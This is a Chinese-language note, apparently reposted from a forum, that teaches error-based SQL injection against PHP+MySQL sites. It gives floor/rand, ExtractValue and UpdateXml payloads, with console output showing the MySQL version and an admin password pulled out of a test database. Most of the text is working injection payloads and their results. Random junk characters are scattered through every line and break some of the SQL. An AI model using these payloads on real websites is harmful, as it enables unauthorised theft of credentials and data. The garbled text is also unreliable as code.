放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
% I4 d8 i: Z; E9 Z) F$ T1 {& {9 Q实际测试环境:
8 j4 R+ a+ `( K% h X. n5 J; v. m
0 |" k; ~% J7 W2 g2 g
mysql> show tables;& ?9 d& B, m: k! Q( ^
+----------------+/ B# d2 S8 {# |* u/ ?
| Tables_in_test |
9 `/ W3 N: P( e2 p. v+----------------+
; N# X+ C3 a U+ B/ A| admin |) z7 H! |; s; f' |5 A, x
| article |; I k8 c( |3 d! {3 x( w
+----------------++ `8 K: G2 E6 c. i, D5 X+ w
) J: V3 l! t0 b; E- T2 Y
4 W+ U+ w, L3 _/ R2 w
$ R5 z" |& a4 ~, |
mysql> describe admin;
# d/ t! m: g8 Z+-------+------------------+------+-----+---------+----------------+# B d9 R9 ]9 T+ x% Q( Q& m: p! m
| Field | Type | Null | Key | Default | Extra |. ^+ V6 ?: D# I! W
+-------+------------------+------+-----+---------+----------------+
6 R; R5 G6 `; v! o. i7 t: {) l| id | int(10) unsigned | NO | PRI | NULL | auto_increment |8 t1 x0 b# H- ?! @# O% s
| user | varchar(50) | NO | | NULL | |& u7 ^5 r: g" u" E( H5 g8 n1 u
| pass | varchar(50) | NO | | NULL | |; \% K0 P9 h! ]1 [' x7 Z
+-------+------------------+------+-----+---------+----------------+3 m+ R, K' G9 G1 y
& V) ?7 J/ {! A# A + r( C6 ]3 k4 u1 {7 v
8 ^6 c' e* o% D; F% P2 I% ?mysql> describe article;
9 z( r4 [$ d$ I H. j" a! [: ~+---------+------------------+------+-----+---------+----------------+" {9 n6 l- N# c; H: g$ Y2 `
| Field | Type | Null | Key | Default | Extra |7 w/ t/ u) v. ?% o8 X
+---------+------------------+------+-----+---------+----------------+ [- X/ x& x( R) R/ J, T
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
" R1 T8 Z2 I5 }" t| title | varchar(50) | NO | | NULL | |
2 C; H* L4 i4 J2 S| content | varchar(50) | NO | | NULL | |6 o3 F% K7 a' C* `
+---------+------------------+------+-----+---------+----------------+
6 N, G: ?7 b, g: I1、通过floor报错
1 p+ U0 ]( E5 |/ R" \5 h7 z# }9 o可以通过如下一些利用代码
* K+ v! m0 f$ T* w; ^' J 4 B9 ]" d& r9 y, W
. P7 P/ S! ]- C5 q$ M2 Zand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
. F/ I X" b, dfrom information_schema.tables group by x)a);
9 D+ m2 r' F: l4 Y2 m 5 x* y! c7 ^: v* [2 U* v# Q* ]
3 \0 r7 h# R# l/ L
and (select count(*) from (select 1 union select null union select !1)x
$ w$ Q6 e# Q! H xgroup by concat((select table_name from information_schema.tables limit 1),
. j; d8 v9 T3 Y8 @+ _floor(rand(0)*2)));
' T4 y0 a9 A0 K: _/ |7 Y举例如下:# q% I) L. R' ^3 P: Y
首先进行正常查询:/ ^( L2 `2 ^+ w# s& @
$ [8 b4 P. w- x7 A& h- M' jmysql> select * from article where id = 1;. v! ^. E) ]( J" X5 ?; O( I0 R% d
+----+-------+---------+% C$ Z1 M* a! |. V; q4 v
| id | title | content |! y8 I# ?+ |! @; D
+----+-------+---------+5 v: y6 {" z, I
| 1 | test | do it |8 G& v2 C. a; o" L
+----+-------+---------+
. T! r& |7 R- P9 L假如id输入存在注入的话,可以通过如下语句进行报错。
" v9 x3 }1 ~/ m' ^3 b2 J5 ]4 T 4 K) i& H# U5 Y& ]2 u ~6 A( q
: j, h: R/ f; g* t8 Q1 {mysql> select * from article where id = 1 and (select 1 from( Y6 V' s/ c9 ?' C% A
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
; t; g! t$ Z) i( G, OERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'. q5 R6 v3 |' H
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。3 r5 s+ i, w7 w
例如我们需要查询管理员用户名和密码:
4 t" }' z+ ~+ a' e* ^Method1:& _8 s$ w8 H" T
% G8 y: P3 h: w: J0 {6 L& E. M
! [, }4 E* ^" n: T" _
mysql> select * from article where id = 1 and (select 1 from0 y5 K9 Q$ z% o2 }
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
7 [, D$ m- ~* U1 s. f& _! Yfrom information_schema.tables group by x)a); p1 J0 A1 f9 s# A- g
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'/ l6 i5 }- J. G8 [
Method2:
, n! t1 h' g6 m: O8 u( | ; N) Q2 }' l0 d3 w5 N
' a6 ]6 U! r& d* y; vmysql> select * from article where id = 1 and (select count(*)
. R& r( ~) l( u7 L( v0 L9 ?from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
& u" U6 P% V0 zfloor(rand(0)*2)));
- n# V6 ?% Z5 ?ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
+ |; p! i K* D/ n# R1 G2、ExtractValue8 ~9 B" }% X! o+ ^) v
测试语句如下
- A: }, E8 L7 g8 r( { / ^- l8 d+ ]+ d: k# R! [# p) f0 h" v
5 d* Q/ x+ m1 _3 v* g9 t+ @
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
) t. \1 X8 y1 G; O2 n& _# u/ k( e实际测试过程. K% @" Z8 A% [3 D# m
. B, ?5 S- p$ P4 L0 Y
! t/ k2 g& A; z0 b
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,) v5 {! \: Q3 X ]8 \ F
(select pass from admin limit 1)));--
( G5 R+ H R3 W3 d5 B2 O/ XERROR 1105 (HY000): XPATH syntax error: '\admin888', \$ E1 {2 i. Q; k
3、UpdateXml
f0 e Q8 c3 ?- p) `测试语句 [4 z) _$ u& k& r
" _( n. I7 V! t" o( G
& s+ Q7 j. R4 o' D% c( k2 b. c* p
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
6 N, j. a3 ?& f- j' m实际测试过程
: G c( | s% ?/ ]8 }
0 @ U" S2 V3 Q0 l' v 6 V/ C: q2 P; W; e5 @2 ~( F: k, h
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,% `7 M' V; t; C& V3 @0 }
(select pass from admin limit 1),0x5e24),1));
! I4 F' u7 Q1 ?. R( [; }: ~6 S( \; KERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
( R# F8 J" x3 d. `All, thanks foreign guys.1 M) G* V% h9 s+ T+ k
2 ~& H7 T& E: O- k& \" K$ l. V, p
|